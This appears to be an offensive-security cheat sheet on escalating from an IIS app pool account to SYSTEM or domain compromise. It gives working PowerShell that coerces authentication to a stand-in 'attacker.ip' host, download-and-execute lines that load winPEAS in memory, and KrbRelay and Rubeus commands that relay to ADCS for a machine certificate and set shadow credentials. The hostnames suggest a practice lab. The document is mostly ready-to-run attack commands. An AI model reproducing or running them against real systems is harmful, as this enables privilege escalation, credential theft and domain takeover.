Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use:

powershell iwr http://attacker.ip -UseDefaultCredentials 

To get an HTTP coerce of the machine account.

AMSI Bypass

winPEAS in Memory

$data=(New-Object System.Net.WebClient).DownloadData('');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);


iex(new-object net.webclient).downloadstring('')
PowerSharpPack -winPEAS


  • RBCD (by @an0n_r0)

  • Relay to ADCS w/ web enrollment to request a certificate of template Machine (by @t0-n1)

    # braavos is the server hosting the ADCS
    $krbrelay = .\KrbRelay.exe -spn http/braavos.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -endpoint certsrv -adcs 'Machine'
    $certificate = $krbrelay[-1]
    echo $certificate
    # The base64 encoded output is usable on `Rubeus.exe`'s `/certificate:<base64>`
    Invoke-Rubeus "asktgt /user:BRAAVOS$ /certificate:$certificate /nowrap"
  • Shadowcred (by @icyguider)

    # meereen is the domain controller
    .\KrbRelay.exe -spn ldap/meereen.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred
    # follow the output to use Rubeus

Further Reading